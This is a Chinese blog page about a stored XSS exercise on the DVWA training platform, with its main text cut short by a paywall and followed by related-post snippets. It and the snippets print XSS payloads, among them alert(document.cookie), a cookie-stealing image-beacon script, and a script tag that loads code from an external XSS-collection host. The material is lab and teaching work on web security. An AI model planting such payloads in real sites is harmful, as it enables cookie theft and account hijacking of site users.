DVWA平台存储型XSS实验

最新推荐文章于 2023-06-09 16:27:58 发布
最新推荐文章于 2023-06-09 16:27:58 发布
阅读量344 收藏 1
点赞数
分类专栏: 知识点
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/KUKULI233/article/details/117258052
版权
这篇博客介绍了DVWA平台上的存储型XSS实验,包括概念和常见使用场景。在概念部分,解释了存储型XSS的特点,即攻击者通过使服务器存储恶意JS脚本来盗取用户cookie。在使用场景部分,讨论了如何通过修改页面信息和绕过防御来实现攻击,并提到了不同级别的防御策略。
摘要由CSDN通过智能技术生成

一、概念

长期存储于服务器端
每次访问都会执行js脚本
在这里插入图片描述

黑客将JS脚本发给服务器,服务器就会存在JS脚本,别的用户访问服务器时就会被脚本盗取cookie,黑客在旁监听
在这里插入图片描述

前几步相同,用户访问带有JS脚本的服务器时被重定向到第三方网站

二、使用场景

直接嵌入<script>alert(‘xss’)</script>
元素事件<body onload=alert(‘xss’
最低0.47元/天 解锁文章
王兰花开富贵险中求
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
储存xxs漏洞实验演示和讲解
北冥有鱼
04-13 894
1.存储xss漏洞 我们来到pikachu平台,打开存储xss可以看到,这里是个留言板,还有几个上次做sql实验留下来的留言,也就是说,我们提交的留言被后台给存储起来了 我们先试着来提交一些特殊符号,可以在网页的源代码中看到我们提交的东西 之后我们还是使用这个payload <script>alert('xss')</script> 之后xss的字符会被弹出来,...
DVWA靶机基于XSS(跨站脚本攻击)的实验
CSFMSKK的博客
06-28 831
书说前言:本文针对DVWA靶机实验,仅供参考。如有雷同,实属他抄。如有用于不轨途径,与本人毫无瓜葛。 XSS是一种发生在前端浏览器的漏洞。XSS某种意义上也是一种注入攻击,攻击者在页面注入恶意代码,当受害者访问网站该页面时,恶意代码就会在浏览器上执行。 XSS共有3种:反射存储、DOM。 反射: low级别:没有任何的过滤和检查,存在明显的XSS漏洞。 直接修改URL 然后执行 medium 对<script>做了黑名单限制 思路:抓包,利用双写和大小写混淆
DVWA靶场存储XSS漏洞实验
weixin_44851588的博客
05-26 4828
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 前言 来自菜鸟的一次简单分享,本次实验主要结合后台源代码讲解,梳理存储XSS实验的思路,如果存在问题,请各位大佬多多指导。 一、XSS基础 1.什么是XSSXSS(Cross-site scripting)被称为跨站脚本攻击,由于与层叠样式表的缩写一样,因此被缩写为XSS。 2.XSS漏洞...
记一次存储XSS(实战)
qq_42383069的博客
04-01 1570
说来也巧,在一个php群里问报错,忽而看到某人发了一句 <sCrIpt srC=//xs.sb/5lpk></sCRipT> 这个一看就是xss代码,群里回复了几下就来加我好友。反正也没事干,那就测试一下站点 先打开站点: 然后点击+号发布任务: 在这里我们插入xss常用的js代码(前面测试会有拦截,这里用到了大小写绕过),然后提交等待登陆! 过一会而鱼儿上钩: 这里我...
DVWA实验XSS反射(弱方法)
Killua
03-22 1138
1.low难度下1.先判断有误XSS漏洞输入&lt;script&gt;alert(/xss/)&lt;/script&gt;值得注意的是输入 &lt;script&gt;alert(xss)&lt;/script&gt; 没有反应显示如下恶意url为:http://localhost/dvwa/vulnerabilities/xss_r/?name=%3Cscript%3Ealert%28%2F...
Dvwa存储XSS攻击全级别学习笔记
Mbys_Lettuce的博客
09-19 2007
和好像被过滤掉了,会不会像反射一样,只是过滤了,只要复写或者大小写可以攻击了呢?把写入内容修改成alert(document.cookie)或者alert(document.cookie)
DVWA-存储xss
Darklord.W
04-09 519
存储: 低: 输入 <script>alert('XSS stored')</script> 存储XSS是长期存储在服务器端,每次访问时都会执行js脚本 <script onload=alert('XSS1')> <a href=https://www.baidu.com>登录</a>3 <scrip...
DVWA-存储XSS漏洞
Drink_J的博客
03-20 1024
(一)将DVWA的级别设置为low 1.分析源码,可以看到首先对两个参数使用trim函数过滤掉两边的空格,然后KaTeX parse error: Undefined control sequence: \” at position 84: …pslashes`函数过滤掉”\̲”̲; 对name参数中使用mysql_real_escape_string函数转义SQL语句中的特殊字符,trim函数去...
DVWA存储XSS
qq_39682037的博客
03-19 2353
存储XSS Security Level: low 源码 <?php if( isset( $_POST[ 'btnSign' ] ) ) { // Get input $message = trim( $_POST[ 'mtxMessage' ] ); $name = trim( $_POST[ 'txtName' ] ); // Sa...
DVWA实验储存XSS
Killua
03-22 1688
1.low直接输入&lt;script&gt;alert(/xss/)&lt;/script&gt;测试,只要查看这个日志就会弹出这个信息,依法炮制试试获取cookiejoke.js var img = document.createElement('img'); img.width = 0; img.height = 0; img.src = 'http://localhost/joke/jok...
结合DVWA-存储XSS
qq_43660551的博客
01-10 2999
一、低级 看下源码:trim()函数过滤掉name和message两边的空格。stripslashes()函数过滤掉“\”。但是未对name做任何过滤。所以考虑在name输入框进行注入。 尝试直接js代码注入。结果发现name输入框有长度限制,本人使用的火狐浏览器,f12,发现name长度为10,直接在代码里修改,比如为30。 然后再name输入框中进行js代码注入。如: <script>alert(document.cookie)</script> <bod
存储xss调研
weixin_33716154的博客
06-28 164
存储xss调研 概念 存储XSS,持久化,代码是存储在服务器中的,如在个人信息或发表文章等地方,加入代码,如果没有过滤或过滤不严,那么这些代码将储存到服务器中,用户访问该页面的时候触发代码执行。 常见的xss攻击方法   1.绕过XSS-Filter,利用<>标签注入Html/JavaScript代码;...
DVWA--存储XSS(初中高)
最新发布
firecjh的博客
06-09 567
选择“View Source”查看源程序,发现服务器端对message框内容使用了htmlspecialchars() 函数进行转义,对name框使用str_replace()函数进行替换。选择“View Source”查看源程序,对message参数进行html转义外,还对name参数使用preg_replace()函数进行替换,不能使用常用的绕过方法。2)在界面出现弹框,弹框内容为本人姓名拼音。2)在界面出现弹框,弹框内容为本人姓名拼音。3) 刷新页面,查看是否再次出现弹框,比较与反射XSS的区别。
DVWA把玩:存储XSS
weixin_43466027的博客
04-16 289
XSS(跨站点脚本)是一种注入攻击。恶意脚本被注入到正常的网站中。 当攻击者使用Web应用程序将恶意代码(通常以浏览器脚本的形式)发送给其他最终用户时,就会发生XSS攻击。一般来说这种攻击发生的原因是没有对用户提交的输入进行过滤。 XSS一般分为反射存储。下面我们会用具体的例子来说明: 0x01 存储XSS 看一下靶场页面。我们的任务是通过下面的两个文本框做做弹窗——能弹窗就约等于能想干嘛干嘛了。 看一下网页源码,我们发现提交的内容会被一纯文本的形式放在网页上: low难度 low难度的话,我们可
XSS攻击及防御
热门推荐
寻道
11-29 20万+
本文来自:高爽|Coder,原文地址:http://blog.csdn.net/ghsau/article/details/17027893,转载请注明。 XSS又称CSS,全称Cross SiteScript,跨站脚本攻击,是Web程序中常见的漏洞,XSS属于被动式且用于客户端的攻击方式,所以容易被忽略其危害性。其原理是攻击者向有XSS漏洞的网站中输入(传入)恶意的H...
结合DVWA靶场学习XSS漏洞-盗取cookie
LUOBIKUN的博客
10-06 3055
XSS概述参考前置知识:定义分类反射XSS:存储XSSDOMXSS危害防御练习(DVWA靶场)反射DVWA-low一般的XSS攻击重定向:DVWA-mediumDVWA-HighDVWA-Impossible存储XSSDVWA-low一般的XSS攻击重定向:DVWA-mediumDVWA-low一般的XSS攻击重定向:获取cookieDVWA-mediumDVWA-high 参考 XSS攻击进阶篇——那些年我们看不懂的XSS 通过浏览器编码深入探究XSS绕过 DVWA-XSS学习笔记 前置知识:
渗透测试笔记(五)——XSS跨站脚本攻击
m0_67044952的博客
06-12 1027
XSS:Cross Site Scripting(跨站脚本)为了避免与CSS混淆,所以简称XSSXSS是指恶意攻击者利用网站没有对用户提交数据进行转义处理或者过滤不足的缺点,进而添加一些代码,嵌入到Web页面中去,使别的用户访问都会执行相应的嵌入代码。从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。XSS攻击的危害盗取各类用户账号,如机器登录账号、用户网银账号、各类管理员账号控制企业数据,包括读取、篡改、添加、删除企业敏感数据的能力盗窃企业重要的具有商业价值的资料非法转账
存储XSS原理讲解及实战实验
liguangyao213的博客
12-23 3278
原理:使用者提交的XSS代码被存储到服务器上的数据库里或页面或某个上传文件里,导致用户访问页面展示的内容时直接触发xss代码。 输入内容后直接在下方回显,回显的地方就是我们插入的内容的地方。 根据显示代码进行闭合弹框尝试,payload: 黑客一般都会使用存储xss进行钓鱼。 在pikachu平台自带有钓鱼功能,鱼饵:http://81.68.155.178:82/pkxss/xfish/fish.php 将上面的鱼饵写入到我们的存储xss中,然后引诱鱼儿上钩: payload:&
dvwa存储xss获取cookie
06-06
DVWA存储XSS攻击可以通过注入恶意脚本来获取用户的cookie信息。攻击者可以在DVWA应用程序中的输入框中注入恶意脚本,当用户访问受影响的页面时,恶意脚本会被执行,将用户的cookie信息发送到攻击者的服务器上。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值